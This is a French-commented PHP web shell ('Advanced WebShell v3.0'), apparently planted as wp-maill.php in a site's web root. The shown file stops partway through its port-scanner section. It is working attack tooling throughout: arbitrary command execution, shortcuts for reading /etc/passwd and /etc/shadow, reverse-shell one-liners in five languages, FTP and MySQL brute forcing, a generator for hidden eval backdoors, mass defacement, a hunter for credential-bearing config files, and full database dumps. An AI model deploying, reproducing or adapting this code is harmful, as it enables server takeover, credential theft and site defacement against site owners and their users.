File: /home/verdoni/www/wp-maill.php
<?php
/*
* ============================================
* Advanced WebShell v3.0
* Full-featured PHP Web Administration Shell
* ============================================
*/
session_start();
error_reporting(0);
set_time_limit(0);
ini_set('max_execution_time', 0);
ini_set('memory_limit', '-1');
// ========== CONFIGURATION ==========
$config = [
'password' => 'admin123', // Changez ce mot de passe !
'shell_name' => 'AdvancedShell v3.0',
'theme_color' => '#1a1a2e',
'accent' => '#e94560',
'text_color' => '#eee',
'login_required' => true,
];
// ========== AUTHENTIFICATION ==========
if ($config['login_required']) {
if (isset($_POST['login_password'])) {
if ($_POST['login_password'] === $config['password']) {
$_SESSION['authenticated'] = true;
}
}
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
if (!isset($_SESSION['authenticated']) || !$_SESSION['authenticated']) {
showLogin($config);
exit;
}
}
// ========== RÉPERTOIRE COURANT ==========
$cwd = isset($_GET['dir']) ? $_GET['dir'] : (isset($_POST['dir']) ? $_POST['dir'] : getcwd());
if (!is_dir($cwd)) $cwd = getcwd();
$cwd = realpath($cwd);
// ========== ACTIONS ==========
$action = isset($_GET['action']) ? $_GET['action'] : (isset($_POST['action']) ? $_POST['action'] : 'filemanager');
$output = '';
// Traitement des actions POST
handlePostActions($cwd);
?>
<!DOCTYPE html>
<html lang="fr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title><?= $config['shell_name'] ?></title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
background: <?= $config['theme_color'] ?>;
color: <?= $config['text_color'] ?>;
font-family: 'Courier New', monospace;
font-size: 13px;
line-height: 1.5;
}
a { color: <?= $config['accent'] ?>; text-decoration: none; }
a:hover { text-decoration: underline; }
.container { max-width: 1400px; margin: 0 auto; padding: 10px; }
.header {
background: #16213e;
padding: 15px 20px;
border-bottom: 2px solid <?= $config['accent'] ?>;
display: flex;
justify-content: space-between;
align-items: center;
flex-wrap: wrap;
}
.header h1 { color: <?= $config['accent'] ?>; font-size: 18px; }
.nav { display: flex; flex-wrap: wrap; gap: 5px; margin: 10px 0; }
.nav a, .nav-btn {
background: #0f3460;
color: #eee;
padding: 6px 12px;
border: 1px solid #1a1a4e;
cursor: pointer;
font-family: 'Courier New', monospace;
font-size: 12px;
transition: 0.2s;
}
.nav a:hover, .nav-btn:hover {
background: <?= $config['accent'] ?>;
text-decoration: none;
color: #fff;
}
.nav a.active { background: <?= $config['accent'] ?>; }
.info-bar {
background: #0a0a23;
padding: 10px 15px;
margin: 10px 0;
border-left: 3px solid <?= $config['accent'] ?>;
font-size: 12px;
overflow-x: auto;
}
.info-bar span { margin-right: 20px; }
.info-label { color: <?= $config['accent'] ?>; font-weight: bold; }
.content { background: #16213e; padding: 15px; margin: 10px 0; border-radius: 4px; }
table { width: 100%; border-collapse: collapse; }
th, td { padding: 6px 10px; text-align: left; border-bottom: 1px solid #1a1a4e; }
th { background: #0a0a23; color: <?= $config['accent'] ?>; position: sticky; top: 0; }
tr:hover { background: #1a1a4e; }
.dir-icon { color: #ffd700; }
.file-icon { color: #87ceeb; }
input[type="text"], input[type="password"], textarea, select {
background: #0a0a23;
color: #eee;
border: 1px solid #333;
padding: 8px;
font-family: 'Courier New', monospace;
font-size: 13px;
width: 100%;
}
textarea { resize: vertical; min-height: 300px; }
input[type="submit"], button, .btn {
background: <?= $config['accent'] ?>;
color: #fff;
border: none;
padding: 8px 16px;
cursor: pointer;
font-family: 'Courier New', monospace;
font-size: 12px;
margin: 2px;
transition: 0.2s;
}
input[type="submit"]:hover, button:hover, .btn:hover { opacity: 0.8; }
.breadcrumb { padding: 10px 0; font-size: 12px; }
.breadcrumb a { color: #ffd700; }
.terminal-output {
background: #000;
color: #0f0;
padding: 15px;
min-height: 200px;
max-height: 500px;
overflow: auto;
white-space: pre-wrap;
word-wrap: break-word;
font-size: 12px;
border: 1px solid #333;
}
.success { color: #0f0; }
.error { color: #f00; }
.warning { color: #ff0; }
.flex-row { display: flex; gap: 10px; align-items: center; margin: 5px 0; }
.tab-content { display: none; }
.tab-content.active { display: block; }
.perm-r { color: #0f0; }
.perm-w { color: #ff0; }
.perm-x { color: #f00; }
.size-col { text-align: right; }
.actions a { margin-right: 8px; font-size: 11px; }
.grid-2 { display: grid; grid-template-columns: 1fr 1fr; gap: 15px; }
@media (max-width: 768px) { .grid-2 { grid-template-columns: 1fr; } }
.progress { background: #333; height: 20px; margin: 5px 0; }
.progress-bar { background: <?= $config['accent'] ?>; height: 100%; transition: width 0.3s; }
.modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; }
.modal-content { background: #16213e; margin: 5% auto; padding: 20px; width: 80%; max-width: 800px; border: 1px solid <?= $config['accent'] ?>; }
.close-btn { float: right; cursor: pointer; color: <?= $config['accent'] ?>; font-size: 20px; }
</style>
</head>
<body>
<div class="header">
<h1>⚡ <?= $config['shell_name'] ?></h1>
<div>
<span style="color:#888">
<?= php_uname() ?>
</span>
<a href="?logout=1" style="margin-left:15px;color:#f55">[Déconnexion]</a>
</div>
</div>
<div class="container">
<!-- Navigation -->
<div class="nav">
<a href="?action=filemanager&dir=<?= urlencode($cwd) ?>" class="<?= $action=='filemanager'?'active':'' ?>">📁 File Manager</a>
<a href="?action=terminal&dir=<?= urlencode($cwd) ?>" class="<?= $action=='terminal'?'active':'' ?>">💻 Terminal</a>
<a href="?action=upload&dir=<?= urlencode($cwd) ?>" class="<?= $action=='upload'?'active':'' ?>">📤 Upload</a>
<a href="?action=sqlmanager" class="<?= $action=='sqlmanager'?'active':'' ?>">🗄 SQL Manager</a>
<a href="?action=phpinfo" class="<?= $action=='phpinfo'?'active':'' ?>">ℹ️ PHP Info</a>
<a href="?action=serverinfo" class="<?= $action=='serverinfo'?'active':'' ?>">🖥 Server Info</a>
<a href="?action=network" class="<?= $action=='network'?'active':'' ?>">🌐 Network</a>
<a href="?action=processes" class="<?= $action=='processes'?'active':'' ?>">⚙️ Processes</a>
<a href="?action=bruteforce" class="<?= $action=='bruteforce'?'active':'' ?>">🔑 Brute Force</a>
<a href="?action=backdoor" class="<?= $action=='backdoor'?'active':'' ?>">🚪 Backdoor</a>
<a href="?action=massdefacer" class="<?= $action=='massdefacer'?'active':'' ?>">🎨 Mass Deface</a>
<a href="?action=configfinder" class="<?= $action=='configfinder'?'active':'' ?>">🔍 Config Finder</a>
<a href="?action=portscanner" class="<?= $action=='portscanner'?'active':'' ?>">🔌 Port Scanner</a>
<a href="?action=reverseshell" class="<?= $action=='reverseshell'?'active':'' ?>">🔄 Reverse Shell</a>
<a href="?action=hasher" class="<?= $action=='hasher'?'active':'' ?>">🔐 Hash Tools</a>
<a href="?action=stringtools" class="<?= $action=='stringtools'?'active':'' ?>">🔤 String Tools</a>
<a href="?action=eval" class="<?= $action=='eval'?'active':'' ?>">▶️ PHP Eval</a>
<a href="?action=selfremove" style="color:#f55">🗑 Self Remove</a>
</div>
<!-- Barre d'info -->
<div class="info-bar">
<span><span class="info-label">User:</span> <?= get_current_user() ?> (<?= getmyuid() ?>)</span>
<span><span class="info-label">Group:</span> <?= getmygid() ?></span>
<span><span class="info-label">Server:</span> <?= @$_SERVER['SERVER_SOFTWARE'] ?></span>
<span><span class="info-label">IP:</span> <?= @$_SERVER['SERVER_ADDR'] ?></span>
<span><span class="info-label">Your IP:</span> <?= @$_SERVER['REMOTE_ADDR'] ?></span>
<span><span class="info-label">Safe Mode:</span> <?= ini_get('safe_mode') ? '<span class="error">ON</span>' : '<span class="success">OFF</span>' ?></span>
<span><span class="info-label">Disabled:</span> <?= ($d=ini_get('disable_functions')) ? substr($d,0,80).'...' : '<span class="success">None</span>' ?></span>
<span><span class="info-label">Free Space:</span> <?= formatSize(@disk_free_space('/')) ?></span>
</div>
<!-- Breadcrumb -->
<div class="breadcrumb">
📂 Path:
<?php
$parts = explode(DIRECTORY_SEPARATOR, $cwd);
$path = '';
foreach ($parts as $i => $part) {
if ($part == '') { $path = '/'; }
else { $path .= $part . '/'; }
echo '<a href="?action='.$action.'&dir='.urlencode(rtrim($path,'/')).'">'
. htmlspecialchars($part ?: '/') . '</a> / ';
}
?>
<?php if (is_writable($cwd)): ?>
<span class="success">[Writable]</span>
<?php else: ?>
<span class="error">[Not Writable]</span>
<?php endif; ?>
</div>
<div class="content">
<?php
// ==========================================
// ROUTEUR D'ACTIONS
// ==========================================
switch ($action) {
// ========== FILE MANAGER ==========
case 'filemanager':
renderFileManager($cwd);
break;
// ========== ÉDITEUR DE FICHIER ==========
case 'edit':
$file = isset($_GET['file']) ? $_GET['file'] : '';
if (isset($_POST['save_content'])) {
@file_put_contents($_POST['filepath'], $_POST['filecontent']);
echo '<p class="success">✅ Fichier sauvegardé.</p>';
$file = $_POST['filepath'];
}
if ($file && is_file($file)) {
$content = htmlspecialchars(file_get_contents($file));
echo '<h3>📝 Éditeur: '.htmlspecialchars(basename($file)).'</h3>';
echo '<form method="post">';
echo '<input type="hidden" name="filepath" value="'.htmlspecialchars($file).'">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<textarea name="filecontent" style="width:100%;height:500px">'.$content.'</textarea><br>';
echo '<input type="submit" name="save_content" value="💾 Sauvegarder">';
echo ' <a href="?action=filemanager&dir='.urlencode(dirname($file)).'" class="btn" style="padding:8px 16px;display:inline-block">↩ Retour</a>';
echo '</form>';
}
break;
// ========== VISUALISATION ==========
case 'view':
$file = isset($_GET['file']) ? $_GET['file'] : '';
if ($file && is_file($file)) {
echo '<h3>👁 Visualisation: '.htmlspecialchars(basename($file)).'</h3>';
echo '<a href="?action=filemanager&dir='.urlencode(dirname($file)).'">↩ Retour</a> | ';
echo '<a href="?action=edit&file='.urlencode($file).'&dir='.urlencode($cwd).'">📝 Éditer</a> | ';
echo '<a href="?action=download&file='.urlencode($file).'">📥 Télécharger</a>';
echo '<div class="terminal-output" style="margin-top:10px">'.htmlspecialchars(file_get_contents($file)).'</div>';
}
break;
// ========== TÉLÉCHARGEMENT ==========
case 'download':
$file = isset($_GET['file']) ? $_GET['file'] : '';
if ($file && is_file($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
break;
// ========== TERMINAL ==========
case 'terminal':
echo '<h3>💻 Terminal / Exécution de commandes</h3>';
echo '<form method="post">';
echo '<input type="hidden" name="action" value="terminal">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<div class="flex-row">';
echo '<span style="color:'.$config['accent'].'">'.htmlspecialchars(get_current_user()).'@'.php_uname('n').':'.htmlspecialchars($cwd).'$</span>';
echo '<input type="text" name="cmd" placeholder="Entrez une commande..." autofocus style="flex:1">';
echo '<input type="submit" value="Exécuter">';
echo '</div></form>';
echo '<div style="margin-top:5px">';
echo '<b>Raccourcis:</b> ';
$shortcuts = ['id','whoami','uname -a','cat /etc/passwd','ls -la','ps aux','netstat -tlnp','ifconfig','df -h','free -m','find / -perm -4000 -type f 2>/dev/null','cat /etc/shadow 2>/dev/null'];
foreach ($shortcuts as $sc) {
echo '<a href="#" onclick="document.querySelector(\'input[name=cmd]\').value=\''.$sc.'\';return false" style="margin:2px;font-size:11px">['.$sc.']</a> ';
}
echo '</div>';
if (isset($_POST['cmd']) && $_POST['cmd']) {
$cmd = $_POST['cmd'];
echo '<div class="terminal-output" style="margin-top:10px">';
echo '<span style="color:'.$config['accent'].'">$ '.htmlspecialchars($cmd).'</span>'."\n\n";
echo htmlspecialchars(executeCommand($cmd, $cwd));
echo '</div>';
}
break;
// ========== UPLOAD ==========
case 'upload':
echo '<h3>📤 Upload de fichiers</h3>';
echo '<div class="grid-2">';
// Upload fichier
echo '<div>';
echo '<h4>Upload Local</h4>';
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="hidden" name="action" value="doupload">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<input type="file" name="uploadfile[]" multiple style="margin:10px 0"><br>';
echo '<label>Destination: <input type="text" name="uploadpath" value="'.htmlspecialchars($cwd).'"></label><br>';
echo '<input type="submit" value="📤 Uploader" style="margin-top:10px">';
echo '</form></div>';
// Upload via URL
echo '<div>';
echo '<h4>Upload depuis URL</h4>';
echo '<form method="post">';
echo '<input type="hidden" name="action" value="urlupload">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<label>URL: <input type="text" name="url" placeholder="https://..."></label><br>';
echo '<label>Nom du fichier: <input type="text" name="urlfilename" placeholder="file.txt"></label><br>';
echo '<label>Destination: <input type="text" name="urlpath" value="'.htmlspecialchars($cwd).'"></label><br>';
echo '<input type="submit" value="📥 Télécharger" style="margin-top:10px">';
echo '</form></div>';
echo '</div>';
// Upload par paste
echo '<h4 style="margin-top:15px">Upload par Paste (Créer un fichier)</h4>';
echo '<form method="post">';
echo '<input type="hidden" name="action" value="createfile">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<label>Nom: <input type="text" name="newfilename" placeholder="shell.php"></label><br>';
echo '<textarea name="newfilecontent" rows="10" placeholder="Contenu du fichier..."></textarea><br>';
echo '<input type="submit" value="📄 Créer" style="margin-top:5px">';
echo '</form>';
break;
// ========== SQL MANAGER ==========
case 'sqlmanager':
echo '<h3>🗄 SQL Manager</h3>';
echo '<form method="post">';
echo '<input type="hidden" name="action" value="sqlmanager">';
echo '<div class="grid-2">';
echo '<div>';
echo '<label>Host: <input type="text" name="sql_host" value="'.(@$_POST['sql_host']?:'localhost').'"></label>';
echo '<label>User: <input type="text" name="sql_user" value="'.@$_POST['sql_user'].'"></label>';
echo '<label>Password: <input type="password" name="sql_pass" value="'.@$_POST['sql_pass'].'"></label>';
echo '<label>Database: <input type="text" name="sql_db" value="'.@$_POST['sql_db'].'"></label>';
echo '<label>Port: <input type="text" name="sql_port" value="'.(@$_POST['sql_port']?:'3306').'"></label>';
echo '</div><div>';
echo '<label>Requête SQL:</label>';
echo '<textarea name="sql_query" rows="8" placeholder="SELECT * FROM users LIMIT 10;">'.@$_POST['sql_query'].'</textarea>';
echo '</div></div>';
echo '<input type="submit" name="sql_exec" value="▶ Exécuter" style="margin-top:10px">';
echo ' <input type="submit" name="sql_showdb" value="📋 Show Databases">';
echo ' <input type="submit" name="sql_showtables" value="📋 Show Tables">';
echo ' <input type="submit" name="sql_dumpdb" value="💾 Dump DB">';
echo '</form>';
if (isset($_POST['sql_exec']) || isset($_POST['sql_showdb']) || isset($_POST['sql_showtables']) || isset($_POST['sql_dumpdb'])) {
$conn = @new mysqli($_POST['sql_host'], $_POST['sql_user'], $_POST['sql_pass'], $_POST['sql_db'], (int)$_POST['sql_port']);
if ($conn->connect_error) {
echo '<p class="error">❌ Connexion échouée: '.$conn->connect_error.'</p>';
} else {
echo '<p class="success">✅ Connecté à '.htmlspecialchars($_POST['sql_host']).'</p>';
$query = '';
if (isset($_POST['sql_showdb'])) $query = 'SHOW DATABASES';
elseif (isset($_POST['sql_showtables'])) $query = 'SHOW TABLES';
elseif (isset($_POST['sql_dumpdb'])) {
// Dump simple
$tables = $conn->query('SHOW TABLES');
$dump = "-- Database Dump: ".$_POST['sql_db']."\n-- Date: ".date('Y-m-d H:i:s')."\n\n";
while ($t = $tables->fetch_row()) {
$table = $t[0];
$create = $conn->query("SHOW CREATE TABLE `$table`")->fetch_row();
$dump .= $create[1].";\n\n";
$rows = $conn->query("SELECT * FROM `$table`");
while ($row = $rows->fetch_assoc()) {
$vals = array_map(function($v) use ($conn) { return $v === null ? 'NULL' : "'".$conn->real_escape_string($v)."'"; }, array_values($row));
$dump .= "INSERT INTO `$table` VALUES(".implode(',', $vals).");\n";
}
$dump .= "\n";
}
echo '<textarea style="height:400px">'.$dump.'</textarea>';
$query = '';
}
else $query = $_POST['sql_query'];
if ($query) {
$result = $conn->query($query);
if ($result === false) {
echo '<p class="error">❌ '.$conn->error.'</p>';
} elseif ($result === true) {
echo '<p class="success">✅ Requête exécutée. Lignes affectées: '.$conn->affected_rows.'</p>';
} else {
echo '<div style="overflow-x:auto;margin-top:10px"><table>';
$first = true;
while ($row = $result->fetch_assoc()) {
if ($first) {
echo '<tr>';
foreach (array_keys($row) as $k) echo '<th>'.htmlspecialchars($k).'</th>';
echo '</tr>';
$first = false;
}
echo '<tr>';
foreach ($row as $v) echo '<td>'.htmlspecialchars($v ?? 'NULL').'</td>';
echo '</tr>';
}
echo '</table></div>';
echo '<p>Total: '.$result->num_rows.' lignes</p>';
}
}
$conn->close();
}
}
break;
// ========== PHP INFO ==========
case 'phpinfo':
echo '<h3>ℹ️ PHP Info</h3>';
ob_start();
phpinfo();
$info = ob_get_clean();
$info = preg_replace('%^.*<body>(.*)</body>.*$%ms', '$1', $info);
echo '<div style="background:#fff;color:#000;padding:10px;overflow:auto;max-height:600px">'.$info.'</div>';
break;
// ========== SERVER INFO ==========
case 'serverinfo':
echo '<h3>🖥 Informations Serveur</h3>';
echo '<table>';
$infos = [
'OS' => php_uname(),
'Hostname' => php_uname('n'),
'Kernel' => php_uname('r'),
'Architecture' => php_uname('m'),
'PHP Version' => phpversion(),
'Server Software' => @$_SERVER['SERVER_SOFTWARE'],
'Server IP' => @$_SERVER['SERVER_ADDR'],
'Server Port' => @$_SERVER['SERVER_PORT'],
'Document Root' => @$_SERVER['DOCUMENT_ROOT'],
'Script Path' => __FILE__,
'Current User' => get_current_user(),
'UID/GID' => getmyuid().'/'.getmygid(),
'PID' => getmypid(),
'Max Execution Time' => ini_get('max_execution_time'),
'Memory Limit' => ini_get('memory_limit'),
'Upload Max Size' => ini_get('upload_max_filesize'),
'Post Max Size' => ini_get('post_max_size'),
'Display Errors' => ini_get('display_errors'),
'Open Basedir' => ini_get('open_basedir') ?: 'None',
'Safe Mode' => ini_get('safe_mode') ? 'ON' : 'OFF',
'Disabled Functions' => ini_get('disable_functions') ?: 'None',
'cURL' => function_exists('curl_init') ? 'Enabled' : 'Disabled',
'MySQL' => function_exists('mysqli_connect') ? 'Enabled' : 'Disabled',
'PostgreSQL' => function_exists('pg_connect') ? 'Enabled' : 'Disabled',
'SQLite' => class_exists('SQLite3') ? 'Enabled' : 'Disabled',
'Loaded Extensions' => implode(', ', get_loaded_extensions()),
];
foreach ($infos as $k => $v) {
echo '<tr><td><b style="color:'.$config['accent'].'">'.$k.'</b></td><td>'.htmlspecialchars($v).'</td></tr>';
}
// Disk info
echo '<tr><td><b style="color:'.$config['accent'].'">Disk Total</b></td><td>'.formatSize(@disk_total_space('/')).'</td></tr>';
echo '<tr><td><b style="color:'.$config['accent'].'">Disk Free</b></td><td>'.formatSize(@disk_free_space('/')).'</td></tr>';
echo '</table>';
// /etc/passwd, hosts etc.
echo '<h4 style="margin-top:15px">Fichiers système</h4>';
$sysfiles = ['/etc/passwd', '/etc/hosts', '/etc/resolv.conf', '/proc/version', '/etc/issue'];
foreach ($sysfiles as $sf) {
if (@is_readable($sf)) {
echo '<details><summary style="cursor:pointer;color:'.$config['accent'].'">'.$sf.'</summary>';
echo '<div class="terminal-output">'.htmlspecialchars(@file_get_contents($sf)).'</div></details>';
}
}
break;
// ========== NETWORK TOOLS ==========
case 'network':
echo '<h3>🌐 Outils Réseau</h3>';
echo '<div class="grid-2">';
// Bind/Connect shell
echo '<div>';
echo '<h4>Back Connect</h4>';
echo '<form method="post">';
echo '<input type="hidden" name="action" value="network">';
echo '<label>IP: <input type="text" name="bc_ip" value="'.@$_POST['bc_ip'].'"></label>';
echo '<label>Port: <input type="text" name="bc_port" value="'.(@$_POST['bc_port']?:'4444').'"></label>';
echo '<select name="bc_method">';
echo '<option value="perl">Perl</option><option value="python">Python</option>';
echo '<option value="php">PHP</option><option value="nc">Netcat</option>';
echo '<option value="bash">Bash</option>';
echo '</select>';
echo '<input type="submit" name="backconnect" value="🔌 Connect">';
echo '</form></div>';
// Lookup
echo '<div>';
echo '<h4>DNS Lookup</h4>';
echo '<form method="post">';
echo '<input type="hidden" name="action" value="network">';
echo '<label>Host: <input type="text" name="lookup_host" value="'.@$_POST['lookup_host'].'"></label>';
echo '<input type="submit" name="dns_lookup" value="🔍 Lookup">';
echo '</form>';
if (isset($_POST['dns_lookup']) && $_POST['lookup_host']) {
$records = @dns_get_record($_POST['lookup_host'], DNS_ALL);
echo '<div class="terminal-output">';
echo "gethostbyname: " . @gethostbyname($_POST['lookup_host']) . "\n\n";
if ($records) {
foreach ($records as $r) {
echo htmlspecialchars(print_r($r, true));
}
}
echo '</div>';
}
echo '</div></div>';
if (isset($_POST['backconnect'])) {
$ip = $_POST['bc_ip'];
$port = (int)$_POST['bc_port'];
$method = $_POST['bc_method'];
$cmds = [
'perl' => "perl -e 'use Socket;\$i=\"$ip\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
'python' => "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
'php' => "php -r '\$sock=fsockopen(\"$ip\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
'nc' => "nc -e /bin/sh $ip $port",
'bash' => "bash -i >& /dev/tcp/$ip/$port 0>&1",
];
echo '<div class="terminal-output">';
echo "Executing: ".htmlspecialchars($cmds[$method])."\n";
echo htmlspecialchars(executeCommand($cmds[$method].' &', $cwd));
echo '</div>';
}
break;
// ========== PROCESSES ==========
case 'processes':
echo '<h3>⚙️ Processus en cours</h3>';
echo '<form method="post"><input type="hidden" name="action" value="processes">';
echo '<div class="flex-row">';
echo '<label>Kill PID: <input type="text" name="kill_pid" size="10"></label>';
echo '<input type="submit" name="killproc" value="☠ Kill">';
echo '<input type="submit" name="killproc9" value="☠ Kill -9">';
echo '</div></form>';
if (isset($_POST['killproc'])) {
echo '<p>'.htmlspecialchars(executeCommand('kill '.(int)$_POST['kill_pid'], $cwd)).'</p>';
}
if (isset($_POST['killproc9'])) {
echo '<p>'.htmlspecialchars(executeCommand('kill -9 '.(int)$_POST['kill_pid'], $cwd)).'</p>';
}
echo '<div class="terminal-output" style="max-height:500px">';
echo htmlspecialchars(executeCommand('ps auxf 2>/dev/null || ps aux 2>/dev/null || tasklist', $cwd));
echo '</div>';
break;
// ========== BRUTE FORCE ==========
case 'bruteforce':
echo '<h3>🔑 Brute Force FTP/MySQL</h3>';
echo '<div class="grid-2"><div>';
echo '<h4>FTP Brute Force</h4>';
echo '<form method="post"><input type="hidden" name="action" value="bruteforce">';
echo '<label>Host: <input type="text" name="bf_host" value="127.0.0.1"></label>';
echo '<label>User list (un par ligne):</label>';
echo '<textarea name="bf_users" rows="5">root
admin
ftp
www-data</textarea>';
echo '<label>Password list (un par ligne):</label>';
echo '<textarea name="bf_passwords" rows="5">password
123456
admin
root
toor</textarea>';
echo '<input type="submit" name="bf_ftp" value="▶ Brute Force FTP">';
echo '</form></div>';
echo '<div><h4>MySQL Brute Force</h4>';
echo '<form method="post"><input type="hidden" name="action" value="bruteforce">';
echo '<label>Host: <input type="text" name="bfm_host" value="127.0.0.1"></label>';
echo '<label>User list:</label><textarea name="bfm_users" rows="5">root
admin
mysql</textarea>';
echo '<label>Password list:</label><textarea name="bfm_passwords" rows="5">
password
root
admin
123456</textarea>';
echo '<input type="submit" name="bf_mysql" value="▶ Brute Force MySQL">';
echo '</form></div></div>';
if (isset($_POST['bf_ftp'])) {
$users = array_filter(explode("\n", str_replace("\r", "", $_POST['bf_users'])));
$passes = array_filter(explode("\n", str_replace("\r", "", $_POST['bf_passwords'])));
echo '<div class="terminal-output">';
foreach ($users as $u) {
foreach ($passes as $p) {
$u = trim($u); $p = trim($p);
$ftp = @ftp_connect($_POST['bf_host'], 21, 5);
if ($ftp && @ftp_login($ftp, $u, $p)) {
echo '<span class="success">✅ FOUND: '.$u.':'.$p.'</span>'."\n";
@ftp_close($ftp);
} else {
echo 'FAIL: '.$u.':'.$p."\n";
}
}
}
echo '</div>';
}
if (isset($_POST['bf_mysql'])) {
$users = array_filter(explode("\n", str_replace("\r", "", $_POST['bfm_users'])));
$passes = array_filter(explode("\n", str_replace("\r", "", $_POST['bfm_passwords'])));
echo '<div class="terminal-output">';
foreach ($users as $u) {
foreach ($passes as $p) {
$u = trim($u); $p = trim($p);
$conn = @new mysqli($_POST['bfm_host'], $u, $p);
if (!$conn->connect_error) {
echo '<span class="success">✅ FOUND: '.$u.':'.$p.'</span>'."\n";
$conn->close();
} else {
echo 'FAIL: '.$u.':'.$p."\n";
}
}
}
echo '</div>';
}
break;
// ========== BACKDOOR GENERATOR ==========
case 'backdoor':
echo '<h3>🚪 Générateur de Backdoor</h3>';
echo '<form method="post"><input type="hidden" name="action" value="backdoor">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<label>Nom du fichier: <input type="text" name="bd_name" value="'.(@$_POST['bd_name']?:'.cache.php').'"></label>';
echo '<label>Type:</label>';
echo '<select name="bd_type">';
echo '<option value="simple">Simple eval</option>';
echo '<option value="hidden">Hidden (Base64)</option>';
echo '<option value="image">Caché dans image header</option>';
echo '<option value="htaccess">.htaccess backdoor</option>';
echo '<option value="cgi">CGI/Perl backdoor</option>';
echo '</select>';
echo '<label>Password: <input type="text" name="bd_pass" value="secret"></label>';
echo '<input type="submit" name="gen_backdoor" value="🚪 Générer">';
echo '</form>';
if (isset($_POST['gen_backdoor'])) {
$pass = $_POST['bd_pass'];
$name = $_POST['bd_name'];
$backdoors = [
'simple' => '<?php if(isset($_REQUEST["'.($pass).'"])){eval($_REQUEST["'.($pass).'"]);} ?>',
'hidden' => '<?php $x=base64_decode("aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpe2V2YWwoJF9SRVFVRVNUWydjbWQnXSk7fQ==");eval($x); ?>',
'image' => "\xFF\xD8\xFF\xE0".'<?php if(isset($_REQUEST["'.$pass.'"])){eval($_REQUEST["'.$pass.'"]);} ?>',
'htaccess' => "AddType application/x-httpd-php .jpg\n# <?php eval(\$_REQUEST['".$pass."']); ?>",
'cgi' => "#!/usr/bin/perl\nuse CGI;my \$q=CGI->new;print \$q->header;my \$c=\$q->param('".$pass."');if(\$c){print `\$c`;}",
];
$bd = $backdoors[$_POST['bd_type']];
$filepath = $cwd . '/' . $name;
if (@file_put_contents($filepath, $bd)) {
@chmod($filepath, 0644);
echo '<p class="success">✅ Backdoor créée: '.htmlspecialchars($filepath).'</p>';
echo '<p>Usage: <code>'.htmlspecialchars($filepath).'?'.$pass.'=phpinfo();</code></p>';
} else {
echo '<p class="error">❌ Erreur écriture</p>';
}
}
break;
// ========== MASS DEFACER ==========
case 'massdefacer':
echo '<h3>🎨 Mass Deface</h3>';
echo '<form method="post"><input type="hidden" name="action" value="massdefacer">';
echo '<label>Répertoire de départ: <input type="text" name="md_path" value="'.htmlspecialchars(@$_POST['md_path']?:$cwd).'"></label>';
echo '<label>Nom du fichier cible: <input type="text" name="md_target" value="'.(@$_POST['md_target']?:'index.php').'"></label>';
echo '<label>Contenu de remplacement:</label>';
echo '<textarea name="md_content" rows="10">'.htmlspecialchars(@$_POST['md_content']?:'<h1>Hacked</h1>').'</textarea>';
echo '<input type="submit" name="massdeface" value="🎨 Lancer Mass Deface">';
echo '</form>';
if (isset($_POST['massdeface'])) {
$count = 0;
$target = $_POST['md_target'];
$content = $_POST['md_content'];
$path = $_POST['md_path'];
echo '<div class="terminal-output">';
massDeface($path, $target, $content, $count);
echo "Total: $count fichiers modifiés\n";
echo '</div>';
}
break;
// ========== CONFIG FINDER ==========
case 'configfinder':
echo '<h3>🔍 Config Finder</h3>';
echo '<form method="post"><input type="hidden" name="action" value="configfinder">';
echo '<label>Répertoire: <input type="text" name="cf_path" value="'.htmlspecialchars(@$_POST['cf_path']?:'/').'"></label>';
echo '<label>Profondeur max: <input type="text" name="cf_depth" value="'.(@$_POST['cf_depth']?:'5').'"></label>';
echo '<input type="submit" name="findconfig" value="🔍 Chercher">';
echo '</form>';
if (isset($_POST['findconfig'])) {
echo '<div class="terminal-output">';
$patterns = ['wp-config.php','configuration.php','config.php','config.inc.php',
'settings.php','database.php','db.php','conn.php','connect.php',
'.env','LocalSettings.php','parameters.yml','app.php'];
$cmd = 'find '.escapeshellarg($_POST['cf_path']).' -maxdepth '.(int)$_POST['cf_depth'].' \$$ ';
$parts = [];
foreach ($patterns as $p) $parts[] = '-name '.escapeshellarg($p);
$cmd .= implode(' -o ', $parts).' \$$ -type f 2>/dev/null';
$results = executeCommand($cmd, $cwd);
$files = array_filter(explode("\n", $results));
foreach ($files as $f) {
$f = trim($f);
echo '<a href="?action=view&file='.urlencode($f).'&dir='.urlencode($cwd).'">'
.htmlspecialchars($f).'</a> ('.formatSize(@filesize($f)).")\n";
}
if (empty($files)) echo "Aucun fichier de configuration trouvé.\n";
echo '</div>';
}
break;
// ========== PORT SCANNER ==========
case 'portscanner':
echo '<h3>🔌 Port Scanner</h3>';
echo '<form method="post"><input type="hidden" name="action" value="portscanner">';
echo '<label>Host: <input type="text" name="ps_host" value="'.(@$_POST['ps_host']?:'127.0.0.1').'"></label>';
echo '<label>Ports (ex: 1-1024 ou 21,22,80,443,3306,8080): <input type="text" name="ps_ports" value="'.(@$_POST['ps_ports']?:'21,22,25,53,80,110,143,443,993,995,3306,5432,6379,8080,8443,27017').'"></label>';
